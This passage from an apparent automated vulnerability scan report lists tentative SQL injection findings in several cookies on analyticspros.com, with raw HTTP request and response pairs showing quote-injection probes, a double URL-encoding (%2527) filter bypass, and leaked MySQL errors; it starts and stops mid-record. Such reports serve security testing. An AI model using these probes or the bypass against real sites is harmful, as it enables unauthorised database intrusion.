Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:58:32 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics/63-kintiskton-llc-in-google-analytics.html?itemid=70#comment%00'' HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=30
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:58:33 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.34. http://www.analyticspros.com/blog/55-googleanalytics/68-unobfuscate-gajs-file.html [__utmmobile cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/68-unobfuscate-gajs-file.html

Issue detail

The __utmmobile cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmmobile cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/55-googleanalytics/68-unobfuscate-gajs-file.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c';

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:07:38 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics/68-unobfuscate-gajs-file.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c'';

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:07:40 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:07:41 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 07:07:41 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21212


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.35. http://www.analyticspros.com/blog/55-googleanalytics/68-unobfuscate-gajs-file.html [ki_t cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/68-unobfuscate-gajs-file.html

Issue detail

The ki_t cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_t cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/55-googleanalytics/68-unobfuscate-gajs-file.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11'; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:58:04 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics/68-unobfuscate-gajs-file.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11''; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:58:06 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.36. http://www.analyticspros.com/blog/55-googleanalytics/77-refresh-rate-content-metric.html [__utma cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/77-refresh-rate-content-metric.html

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utma cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the __utma cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/55-googleanalytics/77-refresh-rate-content-metric.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1%2527; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:01:58 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:01:59 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 07:01:59 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 27914


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...
<h2>Finding the proverbial Needle in the Haystack</h2>
...[SNIP]...

Request 2

GET /blog/55-googleanalytics/77-refresh-rate-content-metric.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1%2527%2527; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:02:00 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.37. http://www.analyticspros.com/blog/55-googleanalytics/77-refresh-rate-content-metric.html [d4dad6935f632ac35975e3001dc7bbe8 cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/77-refresh-rate-content-metric.html

Issue detail

The d4dad6935f632ac35975e3001dc7bbe8 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the d4dad6935f632ac35975e3001dc7bbe8 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the d4dad6935f632ac35975e3001dc7bbe8 cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/55-googleanalytics/77-refresh-rate-content-metric.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=25
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb%2527; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:54:39 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics/77-refresh-rate-content-metric.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=25
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb%2527%2527; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:54:40 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.38. http://www.analyticspros.com/blog/55-googleanalytics/79-google-analytincs-training-emetrics-dc-2009.html [__utma cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/79-google-analytincs-training-emetrics-dc-2009.html

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utma cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/55-googleanalytics/79-google-analytincs-training-emetrics-dc-2009.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1'; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:59:06 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics/79-google-analytincs-training-emetrics-dc-2009.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1''; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:59:07 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.39. http://www.analyticspros.com/blog/55-googleanalytics/79-google-analytincs-training-emetrics-dc-2009.html [fpssCookie cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/79-google-analytincs-training-emetrics-dc-2009.html

Issue detail

The fpssCookie cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the fpssCookie cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the fpssCookie cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/55-googleanalytics/79-google-analytincs-training-emetrics-dc-2009.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true%2527; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:52:43 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics/79-google-analytincs-training-emetrics-dc-2009.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true%2527%2527; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:52:44 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:52:48 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 06:52:48 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21758


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.40. http://www.analyticspros.com/blog/55-googleanalytics/86-google-analytics-intelligence.html [__utmmobile cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/86-google-analytics-intelligence.html

Issue detail

The __utmmobile cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmmobile cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the __utmmobile cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/55-googleanalytics/86-google-analytics-intelligence.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c%2527;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:09:51 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics/86-google-analytics-intelligence.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c%2527%2527;

Response 2

HTTP/1.1 200 OK
